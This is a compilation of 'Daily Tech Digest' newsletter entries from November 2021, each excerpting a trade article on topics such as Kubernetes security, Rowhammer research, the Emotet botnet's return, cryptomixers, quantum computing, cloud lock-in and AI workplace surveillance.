Daily Tech Digest - November 18, 2021

Software Engineering XOR Data Science

Metrics of the software such as number of the requests and response time and error types can be extracted by writing good logs. It is also great to do data checks in the controller class where the requests are received and forwarded to desired services before starting the operations for both SW and DS projects unless the UI side doesn’t do any check. Regex validations and data type checks can literally save the applications at both performance and security sides. An easy SQL injection may be prevented by a simple validation and it can even save the company’s future. On the DS side, there should be further monitoring besides the software metrics. Distribution of the model features and the model predictions are vital. If the distribution of any data column changes, there might be a data-shift and a new model training can be required. If the prediction results can be validated in a short time, these results must be monitored and warn the developers if the accuracy is below or above from a given threshold.


What Developers Should Look for in a Low-Code Platform

To minimize technical debt, it makes sense to reduce the number of platforms on which you build your apps. It follows that the fewer systems you have, the more value you get from each. When choosing a low-code platform, evaluate the other workflows you have deployed on that platform already, or plan to deploy in the future. Let’s say you’re considering an employee suggestion box app. If you already have, or will have, a platform where you run employee workflows, then you not only accelerate the time it takes to create the suggestion box app, but reduce additional technical debt with costly integrations. Bringing in a new platform means you have to replicate the employee information, which creates additional cost to implement and maintain. You can remove the need for that integration by having a single system of record where your employee suggestion box and existing employee workflows exist. Process governance is how you manage things like the request or intake process, change management and release management. When it’s time to release an app on your low-code platform, theoretically it should be as easy as clicking a button. But this is where technical governance comes in.


The race to secure Kubernetes at run time

Although developers now tend to test earlier and more often—or shift left, as it is commonly known—containers require holistic protection throughout the entire life cycle and across disparate, often ephemeral environments. “That makes things really challenging to secure,” Gartner analyst Arun Chandrasekaran told InfoWorld. “You cannot have manual processes here; you have to automate that environment to monitor and secure something that may only live for a few seconds. Reacting to things like that by sending an email is not a recipe that will work.” In its 2019 white paper “BeyondProd: A new approach to cloud-native security,” Google laid out how “just as a perimeter security model no longer works for end users, it also no longer works for microservices,” where protection must extend to “how code is changed and how user data in microservices is accessed.” Where traditional security tools focused on either securing the network or the individual workloads, modern cloud-native environments require a more holistic approach than just securing the build.


How organizations are beefing up their cybersecurity to combat ransomware

Educating employees about cybersecurity is another key method to help thwart ransomware attacks. Among those surveyed, 69% said their organization has boosted cyber education for employees over the last 12 months. Some 20% said they haven't yet done so but are planning to increase training in the next 12 months. Knowing how to design your employee security training is paramount. Some 89% of the respondents said they've educated employees on how to prevent phishing attacks, 95% have focused on how to keep passwords safe and 86% on how to create secure passwords. Finally, more than three-quarters (76%) of the respondents said they're concerned about attacks from other governments or nation states impacting their organization. In response, 47% said they don't feel their own government is taking sufficient action to protect businesses from cyberattacks, and 81% believe the government should play a bigger role in defining national cybersecurity protocol and infrastructure. "IT environments have become more fluid, open, and, ultimately, vulnerable," said Bryan Christ, sales engineer at Hitachi ID Systems.


DevOps transformation: Taking edge computing and continuous updates to space

One of the biggest technological pain points in space travel is power consumption. On Earth, we’re beginning to see more efficient CPU and memory, but in space, throwing away the heat of your CPU is quite hard, making power consumption the critical component. From hardware to software to the way you do processing, everything needs to account for power consumption. On the flip side, in space, there is one thing that you have plenty of (obviously): space. This means that the size of physical hardware is less of a concern. Weight and power consumption are larger issues, because those factors also impact the way microchips and microprocessors are designed. A great example of this can be found in the Ramon Space design. The company uses AI- and machine learning-powered processors to build space-resilient supercomputing systems with Earth-like computing capabilities, with the hardware components ultimately controlled by the software they have riding on top of them. The idea is to optimize the way software and hardware are utilized so applications can be developed and adapted in real time, just as they would be here on Earth.


What is LoRaWAN and why is it taking over the Internet of Things?

The wireless communication takes advantage of the long-range characteristics of the LoRa physical layer allowing a single-hop link between the end-device and one or many gateways. All modes are capable of bi-directional communication, and there is support for multicast addressing groups to make efficient use of spectrum during tasks such as Firmware Over-The-Air (FOTA) upgrades. This has led to LoRaWAN as the implementation of LoRa becoming the most widely used LPWAN technology in the unlicensed bands below 1GHz, providing battery powered sensor nodes with kilometres of range for the expanding applications across the Internet of Things. A key area for this low power, long range connectivity is smart cities. The ability to place wireless smart sensors for air quality, traffic density and transportation wherever they are needed across the urban infrastructure can give key insights into the activity of the city. The robust, low power nature of the protocol allows local authorities to run a cost-effective network with sensors in the right place, whether powered by local power lines, batteries or solar panels.


Serious security vulnerabilities in DRAM memory devices

Razavi and his colleagues have now found that this hardware-based "immune system" only detects rather simple attacks, such as double-sided attacks where two memory rows adjacent to a victim row are targeted but can still be fooled by more sophisticated hammering. They devised a software aptly named "Blacksmith" that systematically tries out complex hammering patterns in which different numbers of rows are activated with different frequencies, phases and amplitudes at different points in the hammering cycle. After that, it checks if a particular pattern led to bit errors. The result was clear and worrying: "We saw that for all of the 40 different DRAM memories we tested, Blacksmith could always find a pattern that induced Rowhammer bit errors," says Razavi. As a consequence, current DRAM memories are potentially exposed to attacks for which there is no line of defense—for years to come. Until chip manufacturers find ways to update mitigation measures on future generations of DRAM chips, computers continue to be vulnerable to Rowhammer attacks.


Money Laundering Cryptomixer Services Market to Criminals

Here's how it functions in greater detail: "Mixers work by allowing threat actors to send a sum of cryptocurrency - usually bitcoin - to a wallet address the mixing service operator owns. This sum joins a pool of the service provider's own bitcoins, as well as other cybercriminals using the service," Intel 471 says in a new report. "The initial threat actor's cryptocurrency joins the back of the 'chain' and the threat actor receives a unique reference number known as a 'mixing code' for deposited funds," the company says. "This code ensures the actor does not get back their own 'dirty' funds that theoretically could be linked to their operations. The threat actor then receives the same sum of bitcoins from the mixer's pool, muddled using the service's proprietary algorithm, minus a service fee." As a further anonymity boost, clean bitcoins can be routed to additional cryptocurrency wallets to make the connections with dirty bitcoins even more difficult for law enforcement authorities to track, Intel 471 says.


Innovation resilience during the pandemic—and beyond

Despite some decline in government spending, the overall impact on global innovation could be minimal. We have reason to be hopeful here: in 2008–09, increases in corporate R&D spending compensated for shortfalls in government R&D investment. And this appears to be true again today based on what we know so far. About 70% of the 2,500 largest global R&D spenders have released their 2020 R&D spending data. We found a healthy increase of roughly 10% in 2020, with roughly 60% of these largest R&D spenders reporting an increase. This reflects a decade-long trend of strong corporate innovation investment, which is perhaps not surprising, as the pace of progress in domains such as artificial intelligence and biotech has increased, and many new commercial growth opportunities have opened up around them. Of course, the view at the sector level is more nuanced. The pandemic-era focus on well-being and the rapid production of vaccines saw increased investments in health-related sectors, with estimates of US government investments in the development of the COVID-19 vaccines ranging from US$18 billion to $23 billion.


How active listening can make you a better leader

When you let the world intrude on a conversation, you unconsciously tell the other person that they are less important than the things around them. Instead, with every interaction strive to make a connection and show people the respect they deserve. To do this, start by limiting distractions. That means closing your laptop, muting your phone, and parking work problems at the door so you can focus and engage with this person in this moment. Of the hundreds of things littering your calendar, is any one of them more important than leading your team? ... t’s not enough simply to silence the world. Show the person that you are listening intently through your responses and body language: Make eye contact and provide brief verbal affirmations or nod, modulating the tone of your voice as well as mirroring their body mannerisms. Paraphrasing what the other person is saying can also be a helpful tool to show you understand or are seeking clarity. When you take time to validate what someone is saying, they will feel comfortable sharing more.



Quote for the day:

"The art of communication is the language of leadership." -- James Humes

Daily Tech Digest - November 16, 2021

8 tips for a standout security analyst resume

Employers increasingly expect to see hands-on experience, says Keatron Evans, principal security researcher at security education provider InfoSec. “Have you done packet capture analysis? Can you understand and parse logs or done incident response in the cloud? It’s important to have that kind of demonstrable hands-on experience verbalized in a resume,” he says. The expectation is high because even if you haven’t held a security analyst job, hands-on experience can be acquired in other ways today, such as training exercises offered by companies like InfoSec, Immersive Labs, and Pluralsight. “Before, training was mostly certificate-driven—it wasn’t geared toward proving you can do these things,” Evans says. “Now there’s simulation in the training environment, which is turning into a good gateway to get your foot in the door.” If candidates can send a five-minute screen capture of themselves performing a task, “it’s worth more than a thousand words,” Evans says. Capture-the-flag (CTF) events are another highlight to include. If you’ve placed well in a well-known CTF or completed a penetration test, put that at the top of the resume as well, he says.


Reducing Cloud Infrastructure Complexity

Organizations the world over are indeed struggling with unnecessarily complicated multi-cloud environments. Validating the global struggle, Enterprise Strategy Group recently conducted a global survey of 1,257 IT decision makers at enterprise and midmarket organizations using both public cloud infrastructure and modern on-premises private cloud environments. The results hit home, and really do cement the notion that this cloud fragmentation is getting worse as time goes on - and that there are many companies out there who are seeking a ‘savior’ toolset to get a zoomed-out view of policies, compliance, security and cost optimization. An unsurprising outcome of the survey is that there is a clear value in cloud management - yet even knowing said value, organizations are struggling with implementation. A mere 5% used consolidated cloud management tools extensively on premise, or across public and/or private cloud. This despite a burgeoning marketplace of all in one solutions like VMWare VRealize Suite, Flexera CMP, Cloudbolt, and others.


Distributed SQL Takes Databases to the Next Level

Distributed SQL is a relational database win-win. The technology’s innovations are based on lessons learned over the past thirty or so years to deliver true dynamic elasticity. The modern benefits of dynamic elasticity include the ability to add or remove nodes simply, quickly, and on-demand. The approach is self-managing, able to automatically rebalance nodes or rebalance data within those nodes while maintaining extremely high continuous availability (i.e., automatic failover). And of course, the approach includes all of the features that make relational databases so powerful, like the ability to use standard SQL (including JOINs) and to maintain ACID compliance. A distributed SQL option like MariaDB’s Xpand is architected for all nodes to work together to form a single logical and distributed database that all applications can point to, regardless of the intended use case. Whether a business needs a three-node cluster for modest workloads or hundreds, even thousands, of nodes for unlimited scalability, distributed SQL means deployments can grow or shrink on demand.


Singularity Is Fast Approaching, and It Will Happen First in the Metaverse

To elaborate on this point more, If we think about it, we have had mainframe computers that evolved to personal computers, which then evolved to mobile devices. In the case of the metaverse however, the leap or the iteration does not necessarily go to a faster device. Instead, to virtual simulations of virtual worlds and virtual environments where through VR and AR, we can finally make it possible to buy things in the real world through these environments. But, in particular, also to buy things that just happen to exist in these virtual environments. Connecting computers to the internet has catapulted them to mainstream use and marked the beginning of the dot-com era, and the last 15 years were clearly shaped by the mobile phone, which led to full mass adoption. This makes the metaverse a very practical concept. It's not just VR concerts, 3D gatherings or digital assets, the metaverse is an idea that brings these concepts together and tries to explain how they are all connected. Matthew Ball, an outspoken proponent of the metaverse, has outlined a few key ideas that show what this evolved form of the internet will look like.


Data Science Is Becoming More Tool-Oriented. Will It Kill The Science Behind?

My other concern is that the number of tools you can use might be considered more important than your data science knowledge. This situation leads to data scientists being evaluated based on tool knowledge, not science. If this happens, it will be a serious problem. Software tools are just there for turning ideas into action or value. The ideas come from data scientists who blend analytical thinking, creativity, statistics, and theory. If data scientists are forced to learn as many tools as possible, they might miss the point. They will get very quick at performing tasks thanks to the highly advanced tools. However, this is not enough for creating value out of data. What leads to creating value is first to define a problem that can be solved with data. Once a problem is defined and a solution is designed, the tools are then needed to do the tasks. I think you would agree that without a problem and solution, there is no use for advanced software tools. To sum up, we definitely need software tools and packages to perform data science. They enable us to work with large amounts of data quickly and efficiently.


Cybercriminals Target Alibaba Cloud for Cryptomining, Malware

Targeting of Alibaba is on the rise thanks to a few unique features of the service, researchers noted, and the way that cloud instances can be configured. “The default Alibaba ECS instance provides root access,” according to the analysis. “With Alibaba, all users have the option to give a password straight to the root user inside the virtual machine (VM).” This is in contrast to how other cloud service providers architect their storage access, researchers pointed out. In most cases, the principle of least privilege is front and center, with different options such as not allowing Secure Shell (SSH) authentication over user and password, or allowing asymmetric cryptography authentication. That way, if cyberattackers gain credentials, entering with only low-privilege access would require them to make an “enhanced effort” to escalate the privileges, according to Trend Micro: “Other cloud service providers do not allow the user to log in via SSH directly by default, so a less privileged user is required.” 


The difference between insights, actionable information and intelligent data

Insight might ultimately stem from data, but that doesn’t mean data – or even ‘intelligent’ data – should be conflated with insight. They aren’t the same thing. That’s not to say that adding intelligence to data isn’t important, of course. After all, raw and unprocessed data can only gain value once we’ve added intelligence – once we have, in other words, annotated and quantified that data. This principle is, of course, magnified in the context of what’s known as ‘big data’, which I generally take to mean datasets that must be measured in terms of gigabytes and exabytes. Through the use of machine learning, it’s possible to add intelligence to this kind of massive dataset through annotating it with sentiment, emotions, topics, and other useful variables. ... As we ascend our knowledge pyramid, it’s easy to see how one might confuse actionable information with true insight. Nonetheless, there is an important distinction between the two terms, especially when it comes to their respective relationships to long-term strategy.


What is Customer Identity and Access Management (CIAM)?

A CIAM system typically resides in the cloud and operates under a software-as-a-service (SaaS) model. It relies on built-in connectors and APIs to tie together various enterprise applications, systems, and data repositories. This makes it possible to combine features, including customer registration, account management, directory services, and authentication. When a customer visits a website or calls in, for example, the CIAM solution handles the authentication process (using a password, single sign-on, biometrics, or multiple factors, for example). It’s also adept at juggling different protocols, including SAML, OpenID Connect, OAuth and FIDO. Once a customer signs in, it’s possible to place an order, track delivery, update a user profile, and handle other account-related tasks. Another benefit of CIAM is that it delivers risk-based authentication (RBA), which is sometimes referred to as adaptive authentication. This means that a system can look for signs and signals -- such as a user’s IP address, User-Agent HTTP headers, the date and time of access, and other factors


Researchers Spot Comeback of the Emotet Botnet

The development is concerning but not surprising for those fighting large-scale botnets. Emotet and Trickbot were essentially run by different departments of one cybercriminal organization that's based in Russia, says Alex Holden, CISO of Hold Security, a Wisconsin-based security consultancy that studies the cybercriminal underground. Researchers have long noticed close associations, with Emotet distributing Trickbot and vice versa. Both have been linked to distribution of ransomware including Ryuk and Conti. "We knew that it [Emotet] would come back," Holden says. "It was a matter of time. But it may signal more battles are ahead. Emotet was the "biggest and baddest" botnet before it was taken down, says James Shank, senior security evangelist and chief architect, Community Services with Team Cymru. A new version of Emotet is being distributed by Trickbot, says Marcus Hutchins, a malware researcher with Kryptos Logic who is also part of Cryptolaemus, a notable group of top security researchers and systems administrators dedicated to fighting Emotet. Emotet's return will likely will eventually mean greater distribution of ransomware. 


Council Post: Building Human-In-The-Loop Systems

Human-in-the-loop systems are essentially about providing this context to AI models. This context could be in various terms. It includes removing bias from models so they adhere to ethical standards, providing situational awareness information to improve predictions or dispensing a final oversight before a decision is made. Context is also the AI system providing context to the human being for further action. When this critical piece of information is missing, it leads to what is popularly known as “the black box problem” where the users don’t really understand how the model has churned data and arrived at a decision. Given the fact that algorithms are driving parts of our lives now with their use in driving cars, giving product recommendations, making investment decisions and even predicting employee attrition, it is becoming integral for stakeholders to understand and trust these AI operations. The key to designing a successful human-in-the-loop system is solving this challenge of two-way communication of context.



Quote for the day:

"A lot of people have gone farther than they thought they could because someone else thought they could." -- Zig Zigler

Daily Tech Digest - November 15, 2021

Creating Time Crystals Using New Quantum Computing Architectures

“A time crystal is perhaps the simplest example of a non-equilibrium phase of matter,” said Yao, UC Berkeley associate professor of physics. “The QuTech system is perfectly poised to explore other out-of-equilibrium phenomena including, for example, Floquet topological phases.” These results follow on the heels of another time crystal sighting, also involving Yao’s group, published in Science several months ago. There, researchers observed a so-called prethermal time crystal, where the subharmonic oscillations are stabilized via high-frequency driving. The experiments were performed in Monroe’s lab at the University of Maryland using a one-dimensional chain of trapped atomic ions, the same system that observed the first signatures of time crystalline dynamics over five years ago. Interestingly, unlike the many-body localized time crystal, which represents an innately quantum Floquet phase, prethermal time crystals can exist as either quantum or classical phases of matter. Many open questions remain. Are there practical applications for time crystals? Can dissipation help to extend a time crystal’s lifetimes? And, more generally, how and when do driven quantum systems equilibrate?


Why Tree-Based Models are Preferred in Credit Risk Modeling?

Credit risk models are used by financial organizations to assess the credit risk of potential borrowers. Based on the credit risk model validation, they decide whether or not to approve a loan as well as the loan’s interest rate. New means of estimating credit risk have emerged as technology has progressed, like credit risk modelling using R and Python. Using the most up-to-date analytics and big data techniques to model credit risk is one of them. Other variables, such as the growth of economies and the creation of various categories of credit risk, have had an impact on credit risk modelling. Machine learning enables more advanced modelling approaches like decision trees and neural networks to be used. This introduces nonlinearities into the model, allowing for the discovery of more complex connections between variables. We selected to employ an XGBoost model that was fed with features picked using the permutation significance technique. ML models, on the other hand, are frequently so complex that they are difficult to understand. We chose to combine XGBoost and logistic regression because interpretability is critical in a highly regulated industry like credit risk assessment.


Intelligent Automation: What’s the Missing Piece of AIOps?

Up until now, AIOps has mostly been used in the context of monitoring. As a buzzword, people tend to think of the term in relation to creating baselines for your data and then alerting to any deviations, connecting multiple sources of information to find the root cause for a problem. These are powerful use cases and are allowing businesses to find correlations that they might not have achieved without AI. For example, you might find that poor bandwidth in a specific region led to an increase in tickets from customers within that location, or that you have idle cloud resources that are costing you in storage or compute dollars behind the scenes, allowing you to make manual changes to optimize costs. However, in many ways, categorizing AIOps as just monitoring and detection doesn’t make it that different from the previous category of IT operations analytics, where companies would look at operational data, including logs and security feeds, and then aggregate these to make smarter decisions. To get more out of AIOps, companies need to move past simple monitoring use cases, and look toward management of the cloud with the help of automation.


The State of Quantum Computing Systems

Quantum computing “systems” are still in development, and as such the entire system paradigm is in flux. While the race to quantum supremacy amongst nations and companies is picking up pace, it’s still at a very early stage to call it a “competition.” There are only a few potential qubit technologies deemed practical, the programming environment is nascent with abstractions that have still not been fully developed, and there are relatively few (albeit extremely exciting) quantum algorithms known to scientists and practitioners. Part of the challenge is that it is very difficult and nearly impractical to simulate quantum applications and technology on classical computers -- doing so would imply that classical computers have themselves outperformed their quantum counterparts! Nevertheless, governments are pouring funding into this field to help push humanity to the next big era in computing. The past decade has shown an impressive gain in qubit technologies, quantum circuits and compilation techniques are being realized, and the progress is leading to even more (good) competition towards the realization of full fledged quantum computers.


Build Your First Machine Learning Model With Zero Configuration — Exploring Google Colab

You may be wondering what’s the point of training an ML model. Well, for different use cases, there are different purposes. But in general, the purpose of training an ML model is more or less about making predictions on things that they’ve never seen. The model is about how to make good predictions. The way to create a model is called training — using existing data to identify a proper way to make predictions. There are many different ways to build a model, such as K-nearest neighbors, SVC, random forest, and gradient boosting, just to name a few. For the purpose of the present tutorial showing you how to build an ML model using Google Colab, let’s just use a model that’s readily available in sklearn — the random forest classifier. One thing to note is that because we have only one dataset. To test the model’s performance, we’ll split the dataset into two parts, one for training and the other for testing. We can simply use the train_test_split method, as shown below. The training dataset has 142 records, while the test dataset has 36 records, approximately in a ratio of 4:1.


Have you traded on-premise lock-in for in-cloud lock-in?

In a global marketplace, being tied to one cloud service can be either impossible to achieve or not tolerable to the business, so cloud vendor neutrality becomes important. Practicality is one driver for always being open to multiple cloud solutions. There’s also vendor strategy: you will get driven, hard, to opt for its version of key parts of the software stack; their cloud version of database, say, as Amazon doesn’t want you to move your Oracle apps onto Amazon, but the Amazon database products instead. In and of itself, that’s not a crazy or risky decision; there are advantages to doing that if you are an Amazon customer already, and there will probably be economies of scale. It might even be cheaper (although that isn’t always the case with cloud contracts). This may feel like an easier solution to adopt, but could be a real headache if you have committed to microservices and have all kinds of open source apps running all over the place (as you want to, as it’s horses for courses here), and the database at the back is an Amazon database. 


A CIO's Introduction to the Metaverse

Collaboration is one of three primary use cases for a metaverse in the enterprise right now, according to Forrester VP J.P. Gownder. Another primary use case is one championed by chip giant Nvidia -- simulations and digital twins. Huang announced Nvidia Omniverse Enterprise during his keynote address at the company’s GTC 2021 online AI conference this month and offered several use cases that focused on simulations and digital twins in industrial settings such as warehouses, plants, and factories. If you are an organization in an industry with expensive assets -- for instance oil and gas, manufacturing, or logistics -- it makes sense to have this use case on your radar, according to Gartner’s Nguyen. “That’s where augmented reality is benefiting enterprise right now,” he says. As an example, during his keynote address, Nvidia’s Huang showed a video of a virtual warehouse created with Nvidia Omniverse Enterprise enabling an organization to visualize the impact of optimized routing in an automated order picking scenario. That’s an example of a particular use case, but Omniverse itself is Nvidia’s platform to enable organizations to create their own simulations or virtual worlds.


Misconfigured FBI Email System Abused to Run Hoax Campaign

The FBI says the misconfiguration involved the Law Enforcement Enterprise Portal, or LEEP, which allows state, local and federal agencies to share information, including sensitive documents. The portal also supports a Virtual Command Center, which allows law enforcement agencies to share real-time information about events such as shootings and child abductions. Although the abused email server is operated by the FBI, the bureau issued an updated statement Sunday noting that the server is not part of the bureau's corporate email service, and that no classified systems or personally identifiable information was compromised. "No actor was able to access or compromise any data or PII on the FBI's network," the FBI says. "Once we learned of the incident, we quickly remediated the software vulnerability, warned partners to disregard the fake emails, and confirmed the integrity of our networks." The hacker-crafted note, a copy of which has been released by Spamhaus, warned that data had potentially been exfiltrated.


Change management: 9 ways to build resilient teams

Resilience may be misunderstood as the ability to bounce back instantly from difficulties or to roll with any manner of punches. Defining or encouraging mindless acceptance of workplace stressors is a recipe for burnout. “The problem is when leadership focuses on building a team’s resilience as a way to avoid addressing unnecessary causes of stress that are part of the organization’s culture,” says David R. Caruso, Ph.D., author of A Leader’s Guide to Solving Challenges with Emotional Intelligence. “We will not, nor should we, try to meditate our way out of a toxic culture. Buying everyone a yoga mat while failing to address sources of unnecessary stress is a problem.” Therefore, it’s importance that IT leaders understand the state of affairs within the IT organization and actively address issues and drivers of burnout. “Burnout and change fatigue – disengagement that comes from constant or poorly managed change – are very real risks for team members and organizations,” says Noelle Akins, leadership coach and founder of Akins & Associates. “Resilience is not just non-stop adaptability.”


How Happiness Technology Is Affecting Our Everyday Lives

Improving employee happiness helps businesses, too. Utilizing this AI technology allows companies to track what's called "psychological capital," a phrase coined by professor Fred Luthans. Helping employees improve their scores not only makes people happier, but also significantly increases productivity and profit for companies. But what about using AI to make us happier outside of work? Happiness technologies have their place in our personal lives as well. ... One problem that the business world has been working on for years is finding a reliable, discreet way to analyze the day-to-day activities of employees to increase productivity and engagement. Research clearly shows that happiness is correlated to better performance, so this trend of tracking and improving employee happiness has gained popularity. On the back of this trend, AI is being used for robotic process automation (RPA) and content intelligence.



Quote for the day:

"Leadership is a matter of having people look at you and gain confidence, seeing how you react. If you're in control, they're in control." -- Tom Landry

Daily Tech Digest - November 14, 2021

Microsoft’s Kubernetes for the rest of us

Getting started with Azure Container Apps is relatively simple, using the Azure Portal and working with ARM templates or programmatically via the Azure CLI. In the Azure Portal, start by setting up your app environment and associated monitoring and storage in an Azure resource group. The app environment is the isolation boundary for your services, automatically setting up a local network for deployed containers. Next create a Log Analytics workspace for your environment. Containers are assigned CPU cores and memory, starting with 0.25 cores and 0.5GB of memory per container, up to 2 cores and 4GB of memory. Fractional cores are a result of using shared tenants, where core-based compute is shared between users. This allows Microsoft to run very high-density Azure Container Apps environments, allowing efficient use of Azure resources for small event-driven containers. Containers are loaded from the Azure Container Registry or any other public registry, including Docker Hub.


Should SMBs Hire Tech Talent Or Outsource?

Taking the work outside the company network reveals a lot of vulnerabilities of the systems. The in-house network and technologies are the best to work on any solution development as they have better security, and every team member would work on keeping it safe. There are no trust issues with your own teams, and it is much simpler to control, track, and communicate right with the members. Here comes the difficult part: Having an in-house team is quite expensive. Let’s consider that the base salary of a developer in India is Rs 6 lakhs per annum. Multiply this for four members, and it comes to Rs 24 lakhs. Of course, this is the least that one has to spend. As the designation increases, so do the salaries. Tech managers are not just expensive but also hard to find. Also, there are added costs of systems, supporting software & tools and training expenses. Since developers need to constantly upskill themselves to stay relevant, that means they will need support to visit conferences and even buy online training courses.


Ready for cloud? Five factors to consider before choosing your partner

In cloud computing, cost isn’t everything, but it’s pretty darn important. That’s why prospective customers really must look at cost options up front for all key services including compute, storage and networking. Outbound networking charges, in particular, have been a sore point for many, many early cloud customers. These “data egress” charges accrue when data is shipped out of a given cloud to the Internet and beyond. Virtually no cloud player charges for data streaming into its cloud from customers, but one first-generation provider notoriously starts the meter running after one GB of data ships out per month to the internet. Those dollars add up incredibly fast, leaving many customers shell shocked because they probably didn’t realize — or could not predict — how much data they might transfer at some point in the future. OCI, on the other hand, starts charging only after 10 TB of data ships out. This means our customers can transfer 10,000 times as much data with OCI as they could with the other provider, without paying a cent. 


Managers aren't worried about keeping their IT workers happy. That's bad for everyone

The lack of focus on employees is also highlighted in responses related to flexible work, NTT Data said: just 21% of executives rated flexible-working options as a top contributor to employee satisfaction – the lowest of any response. This flies in the face of the numerous reports that suggest that flexible-working options are not only important to employees, but something they would consider leaving their jobs over. According to global management consultancy McKinsey, some 15 million Americans have quit their jobs since April 2021. This trend is predicted to carry over into 2022. Research from analytics platform Qualtrics this month found that 65% of workers plan to remain with their employer next year, compared to 70% in 2021. The research was based on nearly 14,000 full-time employees across 27 countries. Workers in the tech industry appear even more likely to seek new opportunities in the coming months. In an October survey of 1,200 US tech and IT employees by TalentLMS and Workable, 72% said they intended to leave their job within the next 12 months.


Lambeq, a Toolkit for Quantum Natural Language Processing

NLP in quantum computing is a complex undertaking that moves from the sequential nature of the spoken word to something less one-dimensional. “The point is that humans evolved language after they evolved a mouth-hole for breathing and eating,” Coecke said. “This physical restriction forces us to speak one word at a time in sequence. This is how we write, too. However, the concepts that we express, the stories we tell, the information we convey to each other, form a dependency network whose connectivity is higher than one-dimensional. Even syntax trees … that you learn in school, that encode dependency information inside a sentence, are two-dimensional structures. Going further, connecting sentences together forms a large network of dependencies between meanings. Telling a story means doing a walk over this network, and this time-ordering gives rise to what I call a ‘language circuit.’” Quantum computers are better suited than classical systems for running NLP workloads, he said.


Open Source Project Aims to Detect Living-Off-the-Land Attacks

The LotL Classifier uses a supervised machine learning approach to extract features from a dataset of command lines and then creates decision trees that match those features to the human-determined conclusions. The dataset combines "bad" samples from open source data, such as industry threat intel reports, and the "good" samples come from Hubble, an open source security compliance framework, as well as Adobe's own endpoint detection and response tools. The feature extraction process generates tags focused on binaries, keywords, command patterns, directory paths, network information, and the similarity of the command to known patterns of attack. Examples of suspicious tags might include a system-command execution path, a Python command, or instructions that attempt to spawn a terminal shell. "The feature extraction process is inspired by human experts and analysts: When analyzing a command line, people/humans rely on certain cues, such as what binaries are being used and what paths are accessed," Adobe stated in its blog post. 


How to Start Cloud Application Development

The IT market is constantly changing so it’s important to keep track of the most popular technologies. StackOverflow survey provides detailed information about the most used scripting and markup languages. Among them, there are Java, Node.js, ASP.NET, and others used for back-end development. Another part of the survey gives us statistics about the most popular JavaScript frameworks used for front-end development. As it was already mentioned, companies choose cloud application development to reduce costs, save time, and achieve high efficiency and high performance. Many IT industry giants launched their own PaaS (Platform as a Service) products to provide ISVs and enterprises with reliable and secure cloud hosting. The choice is wide and can address the needs of cloud application development at any scale. Moreover, all of them have their own advantages and killer features. The choice of the cloud services provider is as much important as a choice of a backend or frontend technology. Besides obvious things like the cost, it impacts how easily it will be for your DevOps to work with, how scalable the app will be, etc.


3 Ways to Deploy Machine Learning Models in Production

Most data science projects deploy machine learning models as an on-demand prediction service or in batch prediction mode. Some modern applications deploy embedded models in edge and mobile devices. Each model has its own merits. For example, in the batch scenario, optimizations are done to minimize model compute cost. There are fewer dependencies on external data sources and cloud services. The local processing power is sometimes sufficient for computing algorithmically complex models. It is also easy to debug an offline model when failures occur or tune hyperparameters since it runs on powerful servers. On the other hand, web services can provide cheaper and near real-time predictions. Availability of CPU power is less of an issue if the model runs on a cluster or cloud service. The model can be easily made available to other applications through API calls and so on. One of the main benefits of embedded machine learning is that we can customize it to the requirements of a specific device.


Council Post: AI Is Not Just Data Sciences

AI is no stranger to workplaces today. Fifty-three per cent of global leaders have integrated or are integrating AI into their workforce to enhance their business insights. While IDC has predicted that by 2022, 75% of enterprises will have embedded intelligent automation into technology and process development, the key aspect to consider is how and through which job roles organisations are going about incorporating AI in their workforce. Recent trends point towards broadening the scope of AI-driven roles in various parts of the workforce. This entails data science job roles spanning across the horizontal along with the vertical pillars of an organisation. With the increased integration of AI and Data Science teams in organisations, it is important for organisations and aspiring data science employees to understand the breadth of job roles. Many leaders are under the fallacy that AI and analytics can do with just data scientists, but the field is not limited to them. In fact, it is not even limited to engineers or individuals with a data science background. 


Convolutional Layers vs Fully Connected Layers

Deep learning is a field of research that has skyrocketed in the past few years with the increase in computational power and advances in the architecture of models. Two kinds of networks you’ll often hear when reading about deep learning are fully connected neural nets (FCNN), and convolutional neural nets (CNNs). These two are the basis of deep learning architectures, and almost all other deep learning neural networks stem from these. In this article I’ll first explain how fully connected layers work, then convolutional layers, finally I’ll go through an example of a CNN). ... Neural networks are a set of dependent non-linear functions. Each individual function consists of a neuron (or a perceptron). In fully connected layers, the neuron applies a linear transformation to the input vector through a weights matrix. A non-linear transformation is then applied to the product through a non-linear activation function f.



Quote for the day:

"Go after your dream, no matter how unattainable others think it is." -- Linda Mastandrea

Daily Tech Digest - November 13, 2021

New law needed to rein in AI-powered workplace surveillance

“AI offers invaluable opportunities to create new work and improve the quality of work if it is designed and deployed with this as an objective,” said the report. “However, we find that this potential is not currently being materialised. “Instead, a growing body of evidence points to significant negative impacts on the conditions and quality of work across the country. Pervasive monitoring and target-setting technologies, in particular, are associated with pronounced negative impacts on mental and physical wellbeing as workers experience the extreme pressure of constant, real-time micro-management and automated assessment.” The report added that a core source of workers’ anxiety around AI-powered monitoring is a “pronounced sense of unfairness and lack of agency” around the automated decisions made about them. “Workers do not understand how personal, and potentially sensitive, information is used to make decisions about the work that they do, and there is a marked absence of available routes to challenge or seek redress,” it said.


New Application Security Toolkit Uncovers Dependency Confusion Attacks

Application security teams will most likely implement the Dependency Combobulator at the CI level, says Moshe Zioni, vice-president of security research at Apiiro. For example, if the team uses Jenkins for its CI process, the toolkit may be used as part of the build process. Another place to use the toolkit would be during code commits and push requests, in which every change in dependency imports will be sent to the Dependency Combobulator for inspection and decision-making. “It can potentially be interconnected via a plugin but that's a more convoluted way that is not easily supported out of the box and will need some extra development work," Zioni says. There are numerous other tools that act similarly to Dependency Combobulator. Snyk offers snync, an open source tool to detect potential instances of dependency confusion in the code repository. Sonatype offers developers a dependency/namespace confusion checker script on GitHub which checks if a project has artifacts with the same name between repositories, and to determine whether the developer has been impacted by a dependency confusion attack in the past.


Managing the risks and returns of intelligent automation

Most companies do not yet have the appropriate structures and tools to effectively manage the risks and returns of intelligent automation. Specifically, different aspects of system development and operation (such as implementation and system management, risk and resilience management, and business-process optimization) are often managed by various functions in a fragmented way. Furthermore, organizations typically lack robust frameworks, processes, and infrastructure to ensure the effective risk and return assessment of AI and automation. It’s therefore increasingly critical for companies to incorporate automation-specific considerations into their broader AI- and digital-risk-management programs. To drive strategic decisions across the organization, institutions can create a holistic view of both the benefits and risks of intelligent automation—including where these tools touch critical processes and where there might be vulnerabilities. They also need to understand not only how to simplify and automate processes, but also how to systematically reduce risk and improve institutional resilience. For this purpose, five key tactical steps can be considered across the automation and AI life cycle


